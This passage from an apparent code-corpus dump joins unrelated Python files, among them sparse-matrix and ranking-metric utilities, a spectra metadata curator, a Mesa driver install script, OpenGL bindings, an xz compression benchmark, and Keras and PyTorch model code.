nr_rows = matrices[0].shape[0]
if any(mat.shape[0] != nr_rows for mat in matrices):
raise ValueError("First dim not match")
if any(idx >= nr_rows or idx < 0 for idx in row_indices):
raise ValueError("row indices should be positive and do not exceed matrix first dimension")
results = []
for mat in matrices:
mat1 = mat[row_indices, :]
if isinstance(mat, smat.csr_matrix):
mat1.sort_indices()
results += [mat1]
return results
def dense_to_coo(dense):
"""Convert a dense matrix to COO format.
Args:
dense (ndarray): input dense matrix
Returns:
coo_matrix
"""
rows = np.arange(dense.shape[0], dtype=np.uint32)
cols = np.arange(dense.shape[1], dtype=np.uint32)
row_idx = np.repeat(rows, np.ones_like(rows) * len(cols)).astype(np.uint32)
col_idx = np.ones((len(rows), 1), dtype=np.uint32).dot(cols.reshape(1, -1)).ravel()
return smat.coo_matrix((dense.ravel(), (row_idx, col_idx)), shape=dense.shape)
def get_relevance_csr(csr, mm=None, dtype=np.float64):
"""Return the csr matrix containing relevance scores based on given prediction csr matrix.
Relevance score is defined as: max_rank - local_rank + 1
Args:
csr (csr_matrix): input CSR matrix, row indices are sorted in descending order
mm (int, optional): max rank, will be inferred from csr if not given
dtype (type, optional): datatype for the returned relevance matrix. Default float64.
Returns:
csr_matrix of relevance scores
"""
if mm is None:
mm = (csr.indptr[1:] - csr.indptr[:-1]).max()
nnz = len(csr.data)
nnz_of_rows = csr.indptr[1:] - csr.indptr[:-1]
row_idx = np.repeat(np.arange(csr.shape[0]), nnz_of_rows)
rel = np.array(
mm - (np.arange(nnz) - csr.indptr[row_idx]), dtype=dtype
) # adding 1 to avoiding zero entries
return smat.csr_matrix((rel, csr.indices, csr.indptr), csr.shape)
def get_sparsified_coo(coo, selected_rows, selected_columns):
"""
Zero out everything not in selected rows and columns.
Args:
coo (coo_matrix): input coo matrix
selected_rows (list of int or np.array(int)): list of rows to be not zeroed out
selected_columns (list of int or np.array(int)): list of columns to be not zeroed out
Returns:
coo matrix with unwanted rows and columns zeroed out.
"""
valid_rows = np.zeros(coo.shape[0], dtype=bool)
valid_cols = np.zeros(coo.shape[1], dtype=bool)
valid_rows[selected_rows] = True
valid_cols[selected_columns] = True
valid_idx = valid_rows[coo.row] & valid_cols[coo.col]
coo = smat.coo_matrix(
(coo.data[valid_idx], (coo.row[valid_idx], coo.col[valid_idx])), shape=coo.shape
)
return coo
def csr_rowwise_mul(A, v):
"""Row-wise multiplication between sparse csr matrix A and dense array v.
Where each row of A is multiplied by the corresponding element in v.
The number of rows of A is same as the length of v.
Args:
A (csr_matrix): The matrix to be multiplied.
v (ndarray): The multiplying vector.
Returns:
Z (csr_matrix): The product of row-wise multiplication of A and v.
"""
if not isinstance(A, smat.csr_matrix):
raise ValueError(f"A must be scipy.sparse.csr_matrix")
if not isinstance(v, np.ndarray):
raise ValueError(f"v must be a numpy ndarray")
if v.ndim != 1:
raise ValueError(f"v should be an 1-d array")
if v.shape[0] != A.shape[0]:
raise ValueError(f"The dimension of v should be the same as the number of rows of A")
Z = A.copy()
for i in range(v.shape[0]):
Z.data[Z.indptr[i] : Z.indptr[i + 1]] *= v[i]
return Z
def csc_colwise_mul(A, v):
"""Column-wise multiplication between sparse csc matrix A and dense array v, where each column of A is multiplied by the corresponding element in v (The number of columns of A is same as the length of v).
Args:
A (csc_matrix): The matrix to be multiplied.
v (ndarray): The multiplying vector.
Returns:
Z (csc_matrix): The product of column-wise multiplication of A and v.
"""
if not isinstance(A, smat.csc_matrix):
raise ValueError(f"A must be scipy.sparse.csc_matrix")
if not isinstance(v, np.ndarray):
raise ValueError(f"v must be a numpy ndarray")
if v.ndim != 1:
raise ValueError(f"v should be an 1-d array")
if v.shape[0] != A.shape[1]:
raise ValueError(f"The dimension of v should be the same as the number of columns of A")
Z = A.copy()
for i in range(v.shape[0]):
Z.data[Z.indptr[i] : Z.indptr[i + 1]] *= v[i]
return Z
def get_cocluster_spectral_embeddings(A, dim=24):
"""Obtain the co-cluster spectral embeddings for the given bipartite graph described in [1]
* [1] `<NAME>, 2001. Co-clustering documents and words using
bipartite spectral graph partition`
Args:
A (csr_matrix or csc_matrix): bipartite graph matrix
dim (int, optional): the dimension of the returned embeddings. Default 24
Returns:
(row_embedding, col_embedding): a tuple of embeddings for rows and columns respectively
row_embedding: numpy.ndarray of shape (A.shape[0], dim).
col_embedding: numpy.ndarray of shape (A.shape[1], dim).
"""
assert A.min() >= 0.0, "A must be nonnegative"
from sklearn.utils.extmath import randomized_svd
# Obtain An, the normalized adjacency bipartite matrix described in Eq (10) of [1]
# A_n = D_1^{-1/2} A D_2^{-1/2}
# row_diag = diagonal of D_1^{-1/2}
# col_diag = diagonal of D_2^{-1/2}
row_diag = np.asarray(np.sqrt(A.sum(axis=1))).squeeze()
col_diag = np.asarray(np.sqrt(A.sum(axis=0))).squeeze()
row_diag[row_diag == 0] = 1.0
col_diag[col_diag == 0] = 1.0
row_diag = 1.0 / row_diag
col_diag = 1.0 / col_diag
if smat.issparse(A):
n_rows, n_cols = A.shape
r = smat.dia_matrix((row_diag, [0]), shape=(n_rows, n_rows))
c = smat.dia_matrix((col_diag, [0]), shape=(n_cols, n_cols))
An = r * A * c
else:
An = row_diag[:, np.newaxis] * A * col_diag
# run SVD on An
nr_discards = 1 # discarding the first component
U, Sigma, VT = randomized_svd(An, dim + nr_discards, random_state=0)
# Normalized the singular vectors based on Eq (24) of [1]
row_embedding = np.ascontiguousarray(row_diag[:, np.newaxis] * U[:, nr_discards:])
col_embedding = np.ascontiguousarray(col_diag[:, np.newaxis] * VT[nr_discards:].T)
return row_embedding, col_embedding
class CsrEnsembler(object):
"""A class implementing several ensemblers for a list sorted CSR predictions"""
@staticmethod
def check_validlity(*args):
"""Check whether input CSR matrices are valid
Args:
args (iterable over csr_matrix): input CSR matrices
"""
for x in args:
assert isinstance(x, smat.csr_matrix), type(x)
assert all(x.shape == args[0].shape for x in args)
@staticmethod
def average(*args):
"""Ensemble predictions by averaging prediction values
Args:
args (iterable over csr_matrix): input CSR matrices
Returns:
ret (csr_matrix): ensembled prediction CSR matrix
"""
CsrEnsembler.check_validlity(*args)
ret = sum(args)
ret = sorted_csr(ret)
ret.data /= len(args)
return ret
@staticmethod
def rank_average(*args):
"""Ensemble predictions by averaging prediction ranks
Args:
args (iterable over csr_matrix): input CSR matrices
Returns:
ret (csr_matrix): ensembled prediction CSR matrix
"""
CsrEnsembler.check_validlity(*args)
mm = max((x.indptr[1:] - x.indptr[:-1]).max() for x in args)
ret = sum(get_relevance_csr(csr, mm) for csr in args)
ret = sorted_csr(ret)
ret.data /= len(args)
return ret
@staticmethod
def round_robin(*args):
"""Ensemble predictions by round robin
Args:
args (iterable over csr_matrix): input CSR matrices
Returns:
ret (csr_matrix): ensembled prediction CSR matrix
"""
CsrEnsembler.check_validlity(*args)
base = 1.0 / (len(args) + 1.0)
mm = max((x.indptr[1:] - x.indptr[:-1]).max() for x in args)
ret = get_relevance_csr(args[0], mm)
ret.data[:] += len(args) * base
for i, x in enumerate(args[1:], 1):
tmp = get_relevance_csr(x, mm)
tmp.data[:] += (len(args) - i) * base
ret = ret.maximum(tmp)
ret = sorted_csr(ret)
ret.data /= len(args)
return ret
@staticmethod
def print_ens(Ytrue, pred_set, param_set, topk=10):
"""Print matrices before and after ensemble
Args:
Ytrue (csr_matrix): ground truth label matrix
pred_set (iterable over csr_matrix): prediction matrices to ensemble
param_set (iterable): parameters or model names associated with pred_set
"""
for param, pred in zip(param_set, pred_set):
print("param: {}".format(param))
print(Metrics.generate(Ytrue, pred, topk=topk))
for ens in [CsrEnsembler.average, CsrEnsembler.rank_average, CsrEnsembler.round_robin]:
print("ens: {}".format(ens.__name__))
print(Metrics.generate(Ytrue, ens(*pred_set), topk=topk))
class Metrics(collections.namedtuple("Metrics", ["prec", "recall"])):
"""The metrics (precision, recall) for multi-label classification problems."""
__slots__ = ()
def __str__(self):
"""Format printing"""
def fmt(key):
return " ".join("{:4.2f}".format(100 * v) for v in getattr(self, key)[:])
return "\n".join("{:7}= {}".format(key, fmt(key)) for key in self._fields)
@classmethod
def default(cls):
"""Default dummy metric"""
return cls(prec=[], recall=[])
@classmethod
def generate(cls, tY, pY, topk=10):
"""Compute the metrics with given prediction and ground truth.
Args:
tY (csr_matrix): ground truth label matrix
pY (csr_matrix): predicted logits
topk (int, optional): only generate topk prediction. Default 10
Returns:
Metrics
"""
assert isinstance(tY, smat.csr_matrix), type(tY)
assert isinstance(pY, smat.csr_matrix), type(pY)
assert tY.shape == pY.shape, "tY.shape = {}, pY.shape = {}".format(tY.shape, pY.shape)
pY = sorted_csr(pY)
total_matched = np.zeros(topk, dtype=np.uint64)
recall = np.zeros(topk, dtype=np.float64)
for i in range(tY.shape[0]):
truth = tY.indices[tY.indptr[i] : tY.indptr[i + 1]]
matched = np.isin(pY.indices[pY.indptr[i] : pY.indptr[i + 1]][:topk], truth)
cum_matched = np.cumsum(matched, dtype=np.uint64)
total_matched[: len(cum_matched)] += cum_matched
recall[: len(cum_matched)] += cum_matched / max(len(truth), 1)
if len(cum_matched) != 0:
total_matched[len(cum_matched) :] += cum_matched[-1]
recall[len(cum_matched) :] += cum_matched[-1] / max(len(truth), 1)
prec = total_matched / tY.shape[0] / np.arange(1, topk + 1)
recall = recall / tY.shape[0]
return cls(prec=prec, recall=recall)
| 2.625 | 3 |
MSMetaEnhancer/libs/Curator.py | xtrojak/pyMSPannotator | 2 | 17665 | <reponame>xtrojak/pyMSPannotator
from matchms import utils
class Curator:
"""
Curator makes sure that all data is curated before the actual annotation can proceed.
Currently, fixing CAS numbers to correct format is supported.
"""
def curate_spectra(self, spectra):
"""
Iterates over given spectrums and curates individual spectra.
:param spectra: given spectrums
:return: curated spectrums
"""
for spectrum in spectra.spectrums:
spectrum.metadata = self.curate_metadata(spectrum.metadata)
return spectra
def curate_metadata(self, metadata):
"""
Curate metadata of particular spectra.
:param metadata: given metadata
:return: curated metadata
"""
if 'casno' in metadata:
metadata['casno'] = self.fix_cas_number(metadata['casno'])
return metadata
@staticmethod
def fix_cas_number(cas_number):
"""
Adds dashes to CAS number.
:param cas_number: given CAS number
:return: CAS number enriched by dashes (if needed)
"""
if "-" not in cas_number:
return f'{cas_number[:-3]}-{cas_number[-3:-1]}-{cas_number[-1]}'
return cas_number
@staticmethod
def filter_invalid_metadata(metadata):
"""
Validates metadata and filters out invalid ones.
:param metadata: metadata content
:return: only valid metadata
"""
filters = {
'smiles': utils.is_valid_smiles,
'inchi': utils.is_valid_inchi,
'inchikey': utils.is_valid_inchikey
}
valid_metadata = {}
for (attribute, value) in metadata.items():
if attribute in filters.keys():
if filters[attribute](value):
valid_metadata[attribute] = value
else:
valid_metadata[attribute] = value
return valid_metadata
| 2.453125 | 2 |
bin/install_megadrivers.py | antmicro/kvm-aosp-external-mesa3d | 0 | 17666 | <filename>bin/install_megadrivers.py<gh_stars>0
#!/usr/bin/env python
# encoding=utf-8
# Copyright © 2017-2018 Intel Corporation
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Script to install megadriver symlinks for meson."""
from __future__ import print_function
import argparse
import os
import shutil
def main():
parser = argparse.ArgumentParser()
parser.add_argument('megadriver')
parser.add_argument('libdir')
parser.add_argument('drivers', nargs='+')
args = parser.parse_args()
if os.path.isabs(args.libdir):
to = os.path.join(os.environ.get('DESTDIR', '/'), args.libdir[1:])
else:
to = os.path.join(os.environ['MESON_INSTALL_DESTDIR_PREFIX'], args.libdir)
master = os.path.join(to, os.path.basename(args.megadriver))
if not os.path.exists(to):
os.makedirs(to)
shutil.copy(args.megadriver, master)
for each in args.drivers:
driver = os.path.join(to, each)
if os.path.exists(driver):
os.unlink(driver)
print('installing {} to {}'.format(args.megadriver, driver))
os.link(master, driver)
try:
ret = os.getcwd()
os.chdir(to)
name, ext = os.path.splitext(each)
while ext != '.so':
if os.path.exists(name):
os.unlink(name)
os.symlink(each, name)
name, ext = os.path.splitext(name)
finally:
os.chdir(ret)
os.unlink(master)
if __name__ == '__main__':
main()
| 1.992188 | 2 |
python_files/helpers.py | nilamo/pytchie | 10 | 17667 | #!/usr/bin/env python
import os
import sys
def midi_to_freq(num):
""" Takes a MIDI number and returns a frequency in Hz for corresponding note. """
num_a = num - 69
freq = 440 * 2**(num_a / 12.0)
return freq
def fp(relative):
#if hasattr(sys, "_MEIPASS"):
# return os.path.join(sys._MEIPASS, relative)
return os.path.join(relative)
if __name__ == '__main__':
print(midi_to_freq(69))
print(midi_to_freq(60))
print(midi_to_freq(105))
| 3.25 | 3 |
test/integrationMyndFskr.py | redhog/ferenda | 18 | 17668 | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from builtins import *
import os
import sys
import shutil
import inspect
from ferenda import TextReader, util
from ferenda.testutil import RepoTester, file_parametrize
from ferenda.compat import unittest
# SUT
from ferenda.sources.legal.se import myndfskr
class Parse(RepoTester):
repoclass = myndfskr.MyndFskrBase # in some cases we might need to get a
# specific one like SOSFS, see below
aliases = {} # setUpClass fills this in
@classmethod
def setUpClass(cls):
super(Parse, cls).setUpClass()
# enumerate all classes defined in the module where
# MyndFskrBase is defined, check their static property 'alias'
# and use it to add to cls.aliases
for name, obj in inspect.getmembers(myndfskr):
if inspect.isclass(obj) and hasattr(obj, 'alias'):
cls.aliases[obj.alias] = obj
def parse_filename(self, filename):
# a few of the subclasses have specialized rules. make sure we
# instantiate the correct class
alias = os.path.basename(filename).split("-")[0]
basefile = os.path.splitext(
os.path.basename(filename))[0].replace("-",
"/", 1).replace("-", ":")
repoclass = self.aliases[alias]
repo = repoclass(datadir=self.datadir,
storelocation=self.datadir + "/ferenda.sqlite",
indexlocation=self.datadir + "/whoosh",)
return repo, basefile
def parametric_test(self, filename):
# these options adjusts the constructed URIs. by default, the
# official rpubl URIs are minted.
#
# self.repo.config.localizeuri = True
# self.repo.config.url = "http://example.org/"
# self.repo.config.urlpath = ''
# a few of the subclasses have specialized rules. make sure we
# instantiate the correct class
repo, basefile = self.parse_filename(filename)
doc = repo.make_document(basefile)
text = repo.sanitize_text(util.readfile(filename), basefile)
reader = TextReader(string=text, encoding='utf-8')
props = repo.extract_metadata(reader, basefile)
props = repo.sanitize_metadata(props, basefile)
resource = repo.polish_metadata(props, basefile)
repo.infer_metadata(resource, basefile)
wantfile = filename.replace(".txt", ".n3")
if os.path.exists(wantfile):
self.assertEqualGraphs(wantfile, resource.graph, exact=False)
else:
self.fail("Expected a %s with the following content:\n\n%s" %
(wantfile, doc.meta.serialize(format="n3").decode("utf-8")))
file_parametrize(Parse, "test/files/myndfskr", ".txt")
| 2.234375 | 2 |
OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/NV/geometry_program4.py | JE-Chen/je_old_repo | 0 | 17669 | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_NV_geometry_program4'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_NV_geometry_program4',error_checker=_errors._error_checker)
GL_FRAMEBUFFER_ATTACHMENT_LAYERED_EXT=_C('GL_FRAMEBUFFER_ATTACHMENT_LAYERED_EXT',0x8DA7)
GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_LAYER_EXT=_C('GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_LAYER_EXT',0x8CD4)
GL_FRAMEBUFFER_INCOMPLETE_LAYER_COUNT_EXT=_C('GL_FRAMEBUFFER_INCOMPLETE_LAYER_COUNT_EXT',0x8DA9)
GL_FRAMEBUFFER_INCOMPLETE_LAYER_TARGETS_EXT=_C('GL_FRAMEBUFFER_INCOMPLETE_LAYER_TARGETS_EXT',0x8DA8)
GL_GEOMETRY_INPUT_TYPE_EXT=_C('GL_GEOMETRY_INPUT_TYPE_EXT',0x8DDB)
GL_GEOMETRY_OUTPUT_TYPE_EXT=_C('GL_GEOMETRY_OUTPUT_TYPE_EXT',0x8DDC)
GL_GEOMETRY_PROGRAM_NV=_C('GL_GEOMETRY_PROGRAM_NV',0x8C26)
GL_GEOMETRY_VERTICES_OUT_EXT=_C('GL_GEOMETRY_VERTICES_OUT_EXT',0x8DDA)
GL_LINES_ADJACENCY_EXT=_C('GL_LINES_ADJACENCY_EXT',0x000A)
GL_LINE_STRIP_ADJACENCY_EXT=_C('GL_LINE_STRIP_ADJACENCY_EXT',0x000B)
GL_MAX_GEOMETRY_TEXTURE_IMAGE_UNITS_EXT=_C('GL_MAX_GEOMETRY_TEXTURE_IMAGE_UNITS_EXT',0x8C29)
GL_MAX_PROGRAM_OUTPUT_VERTICES_NV=_C('GL_MAX_PROGRAM_OUTPUT_VERTICES_NV',0x8C27)
GL_MAX_PROGRAM_TOTAL_OUTPUT_COMPONENTS_NV=_C('GL_MAX_PROGRAM_TOTAL_OUTPUT_COMPONENTS_NV',0x8C28)
GL_PROGRAM_POINT_SIZE_EXT=_C('GL_PROGRAM_POINT_SIZE_EXT',0x8642)
GL_TRIANGLES_ADJACENCY_EXT=_C('GL_TRIANGLES_ADJACENCY_EXT',0x000C)
GL_TRIANGLE_STRIP_ADJACENCY_EXT=_C('GL_TRIANGLE_STRIP_ADJACENCY_EXT',0x000D)
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,_cs.GLuint,_cs.GLint)
def glFramebufferTextureEXT(target,attachment,texture,level):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,_cs.GLuint,_cs.GLint,_cs.GLenum)
def glFramebufferTextureFaceEXT(target,attachment,texture,level,face):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,_cs.GLuint,_cs.GLint,_cs.GLint)
def glFramebufferTextureLayerEXT(target,attachment,texture,level,layer):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glProgramVertexLimitNV(target,limit):pass
| 1.507813 | 2 |
benchbuild/projects/benchbuild/xz.py | sturmianseq/benchbuild | 11 | 17670 | from plumbum import local
import benchbuild as bb
from benchbuild.environments.domain.declarative import ContainerImage
from benchbuild.source import HTTP
from benchbuild.utils.cmd import make, tar
class XZ(bb.Project):
""" XZ """
VERSION = '5.2.1'
NAME = 'xz'
DOMAIN = 'compression'
GROUP = 'benchbuild'
SOURCE = [
HTTP(
remote={'5.2.1': 'http://tukaani.org/xz/xz-5.2.1.tar.gz'},
local='xz.tar.gz'
),
HTTP(
remote={'1.0': 'http://lairosiel.de/dist/compression.tar.gz'},
local='compression.tar.gz'
)
]
CONTAINER = ContainerImage().from_('benchbuild:alpine')
def compile(self):
xz_source = local.path(self.source_of('xz.tar.gz'))
xz_version = self.version_of('xz.tar.gz')
compression_source = local.path(self.source_of('compression.tar.gz'))
tar('xf', xz_source)
tar('xf', compression_source)
unpack_dir = local.path(f'xz-{xz_version}')
clang = bb.compiler.cc(self)
with local.cwd(unpack_dir):
configure = local["./configure"]
_configure = bb.watch(configure)
with local.env(CC=str(clang)):
_configure(
"--enable-threads=no", "--with-gnu-ld=yes",
"--disable-shared", "--disable-dependency-tracking",
"--disable-xzdec", "--disable-lzmadec",
"--disable-lzmainfo", "--disable-lzma-links",
"--disable-scripts", "--disable-doc"
)
_make = bb.watch(make)
_make("CC=" + str(clang), "clean", "all")
def run_tests(self):
xz_version = self.version_of('xz.tar.gz')
unpack_dir = local.path(f'xz-{xz_version}')
xz = bb.wrap(unpack_dir / "src" / "xz" / "xz", self)
_xz = bb.watch(xz)
# Compress
_xz("--compress", "-f", "-k", "-e", "-9", "compression/text.html")
_xz("--compress", "-f", "-k", "-e", "-9", "compression/chicken.jpg")
_xz("--compress", "-f", "-k", "-e", "-9", "compression/control")
_xz("--compress", "-f", "-k", "-e", "-9", "compression/input.source")
_xz("--compress", "-f", "-k", "-e", "-9", "compression/liberty.jpg")
# Decompress
_xz("--decompress", "-f", "-k", "compression/text.html.xz")
_xz("--decompress", "-f", "-k", "compression/chicken.jpg.xz")
_xz("--decompress", "-f", "-k", "compression/control.xz")
_xz("--decompress", "-f", "-k", "compression/input.source.xz")
_xz("--decompress", "-f", "-k", "compression/liberty.jpg.xz")
| 2.140625 | 2 |
train.py | sazzad/CarND-Behavioral-Cloning-P3 | 0 | 17671 | import numpy as np
import csv
import cv2
from keras.models import Sequential
from keras.layers import Dense, Flatten
def load_data():
lines = []
with open('Data/driving_log.csv') as csvfile:
reader = csv.reader(csvfile)
for line in reader:
lines.append(line)
images = []
measurements = []
for line in lines:
source_path = line[0]
filename = source_path.split('/')[-1]
current_path = 'Data/IMG/'+filename
image = cv2.imread(current_path)
images.append(image)
measurement = float(line[3])
measurements.append(measurement)
X_train = np.array(images)
y_train = np.array(measurements)
return X_train, y_train
def train(X_train, y_train):
model = Sequential()
model.add(Flatten(input_shape=(160, 320, 3)))
model.add(Dense(1))
model.compile(loss='mse', optimizer='adam')
model.fit(X_train, y_train, validation_split=0.2, shuffle=True, nb_epoch=10)
model.save('model.h5')
if __name__ == "__main__":
X_train, y_train = load_data()
train(X_train, y_train) | 2.984375 | 3 |
models/FedXXX/resnet_utils.py | TD21forever/QoS-Predcition-Algorithm-library | 2 | 17672 | from abc import get_cache_token
from collections import OrderedDict
from torch import nn
class ResidualBlock(nn.Module):
def __init__(self, in_size, out_size):
super().__init__()
self.in_size, self.out_size = in_size, out_size
self.blocks = nn.Identity()
self.shortcut = nn.Identity()
def forward(self, x):
residual = x
if self.should_apply_shortcut:
residual = self.shortcut(x)
x = self.blocks(x)
x += residual
return x
@property
def should_apply_shortcut(self):
return self.in_size != self.out_size
# 用来处理short cut
class ResNetResidualBlock(ResidualBlock):
def __init__(self, in_size, out_size):
super().__init__(in_size, out_size)
self.shortcut = nn.Sequential(OrderedDict(
{
'dense': nn.Linear(self.in_size, self.out_size),
# 'bn': nn.BatchNorm1d(self.out_size)
})) if self.should_apply_shortcut else None
@property
def should_apply_shortcut(self):
return self.in_size != self.out_size
# 来定义一个block
class ResNetBasicBlock(ResNetResidualBlock):
def __init__(self, in_size, out_size, activation=nn.ReLU):
super().__init__(in_size, out_size)
self.blocks = nn.Sequential(
nn.Linear(self.in_size, self.out_size),
activation(),
nn.Linear(self.out_size, self.out_size),
)
# 定义一个resnet层,里面会有多个block
class ResNetLayer(nn.Module):
def __init__(self, in_size, out_size, block=ResNetBasicBlock, n=1, activation=nn.ReLU):
super().__init__()
self.blocks = nn.Sequential(
block(in_size, out_size, activation),
*[block(out_size,
out_size, activation) for _ in range(n-1)]
)
def forward(self, x):
x = self.blocks(x)
return x
# 由多个resnet layer组成encoder
class ResNetEncoder(nn.Module):
"""
ResNet encoder composed by decreasing different layers with increasing features.
"""
def __init__(self, in_size=128, blocks_sizes=[64, 32, 16], deepths=[2, 2, 2],
activation=nn.ReLU, block=ResNetBasicBlock):
super().__init__()
self.blocks_sizes = blocks_sizes
self.gate = nn.Sequential(
nn.Linear(in_size, self.blocks_sizes[0]),
# nn.BatchNorm1d(self.blocks_sizes[0]),
activation(),
)
self.in_out_block_sizes = list(zip(blocks_sizes, blocks_sizes[1:]))
self.blocks = nn.ModuleList([
*[ResNetLayer(in_size, out_size, n=n, activation=activation, block=block)
for (in_size, out_size), n in zip(self.in_out_block_sizes, deepths)]
])
def forward(self, x):
x = self.gate(x)
for block in self.blocks:
x = block(x)
return x
if __name__ == "__main__":
m = ResNetEncoder()
def get_parameter_number(net):
total_num = sum(p.numel() for p in net.parameters())
trainable_num = sum(p.numel()
for p in net.parameters() if p.requires_grad)
return {'Total': total_num, 'Trainable': trainable_num}
print(get_parameter_number(m))
| 2.40625 | 2 |
xblock/test/test_json_conversion.py | edly-io/XBlock | 0 | 17673 | """
Tests asserting that ModelTypes convert to and from json when working
with ModelDatas
"""
# Allow inspection of private class members
# pylint: disable=protected-access
from mock import Mock
from xblock.core import XBlock
from xblock.fields import Field, Scope, ScopeIds
from xblock.field_data import DictFieldData
from xblock.test.tools import TestRuntime
class TestJSONConversionField(Field):
"""Field for testing json conversion"""
__test__ = False
def from_json(self, value):
assert value['$type'] == 'set'
return set(value['$vals'])
def to_json(self, value):
return {
'$type': 'set',
'$vals': sorted(value)
}
class TestBlock(XBlock):
"""XBlock for testing json conversion"""
__test__ = False
field_a = TestJSONConversionField(scope=Scope.content)
field_b = TestJSONConversionField(scope=Scope.content)
class TestModel(DictFieldData):
"""ModelData for testing json conversion"""
__test__ = False
def default(self, block, name):
return {'$type': 'set', '$vals': [0, 1]}
class TestJsonConversion:
"""
Verify that all ModelType operations correctly convert
the json that comes out of the ModelData to python objects
"""
def setup_method(self):
"""
Setup for each test method in this class.
"""
field_data = TestModel({
'field_a': {'$type': 'set', '$vals': [1, 2, 3]}
})
runtime = TestRuntime(services={'field-data': field_data})
self.block = TestBlock(runtime, scope_ids=Mock(spec=ScopeIds)) # pylint: disable=attribute-defined-outside-init
def test_get(self):
# Test field with a value
assert isinstance(self.block.field_a, set)
# Test ModelData default
assert isinstance(self.block.field_b, set)
def test_set(self):
self.block.field_b = set([5, 6, 5])
self.block.save()
assert isinstance(self.block.field_b, set)
assert {'$type': 'set', '$vals': [5, 6]} == \
self.block._field_data.get(self.block, 'field_b')
| 2.828125 | 3 |
uq_benchmark_2019/experiment_utils.py | pedersor/google-research | 0 | 17674 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities to help set up and run experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path
from absl import logging
import numpy as np
import scipy.special
from six.moves import range
from six.moves import zip
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
gfile = tf.io.gfile
class _SimpleJsonEncoder(json.JSONEncoder):
def default(self, o):
return o.__dict__
def json_dumps(x):
return json.dumps(x, indent=2, cls=_SimpleJsonEncoder)
def record_config(config, path):
out = json_dumps(config)
logging.info('Recording config to %s\n %s', path, out)
gfile.makedirs(os.path.dirname(path))
with gfile.GFile(path, 'w') as fh:
fh.write(out)
def load_config(path):
logging.info('Loading config from %s', path)
with gfile.GFile(path) as fh:
return json.loads(fh.read())
def save_model(model, output_dir):
"""Save Keras model weights and architecture as HDF5 file."""
save_path = '%s/model.hdf5' % output_dir
logging.info('Saving model to %s', save_path)
model.save(save_path, include_optimizer=False)
return save_path
def load_model(path):
logging.info('Loading model from %s', path)
return tf.keras.models.load_model(path)
def metrics_from_stats(stats):
"""Compute metrics to report to hyperparameter tuner."""
labels, probs = stats['labels'], stats['probs']
# Reshape binary predictions to 2-class.
if len(probs.shape) == 1:
probs = np.stack([1-probs, probs], axis=-1)
assert len(probs.shape) == 2
predictions = np.argmax(probs, axis=-1)
accuracy = np.equal(labels, predictions)
label_probs = probs[np.arange(len(labels)), labels]
log_probs = np.maximum(-1e10, np.log(label_probs))
brier_scores = np.square(probs).sum(-1) - 2 * label_probs
return {'accuracy': accuracy.mean(0),
'brier_score': brier_scores.mean(0),
'log_prob': log_probs.mean(0)}
def make_predictions(
model, batched_dataset, predictions_per_example=1, writers=None,
predictions_are_logits=True, record_image_samples=True, max_batches=1e6):
"""Build a dictionary of predictions for examples from a dataset.
Args:
model: Trained Keras model.
batched_dataset: tf.data.Dataset that yields batches of image, label pairs.
predictions_per_example: Number of predictions to generate per example.
writers: `dict` with keys 'small' and 'full', containing
array_utils.StatsWriter instances for full prediction results and small
prediction results (omitting logits).
predictions_are_logits: Indicates whether model outputs are logits or
probabilities.
record_image_samples: `bool` Record one batch of input examples.
max_batches: `int`, maximum number of batches.
Returns:
Dictionary containing:
labels: Labels copied from the dataset (shape=[N]).
logits_samples: Samples of model predict outputs for each example
(shape=[N, M, K]).
probs: Probabilities after averaging over samples (shape=[N, K]).
image_samples: One batch of input images (for sanity checking).
"""
if predictions_are_logits:
samples_key = 'logits_samples'
avg_probs_fn = lambda x: scipy.special.softmax(x, axis=-1).mean(-2)
else:
samples_key = 'probs_samples'
avg_probs_fn = lambda x: x.mean(-2)
labels, outputs = [], []
predict_fn = model.predict if hasattr(model, 'predict') else model
for i, (inputs_i, labels_i) in enumerate(tfds.as_numpy(batched_dataset)):
logging.info('iteration: %d', i)
outputs_i = np.stack(
[predict_fn(inputs_i) for _ in range(predictions_per_example)], axis=1)
if writers is None:
labels.extend(labels_i)
outputs.append(outputs_i)
else:
avg_probs_i = avg_probs_fn(outputs_i)
prediction_batch = dict(labels=labels_i, probs=avg_probs_i)
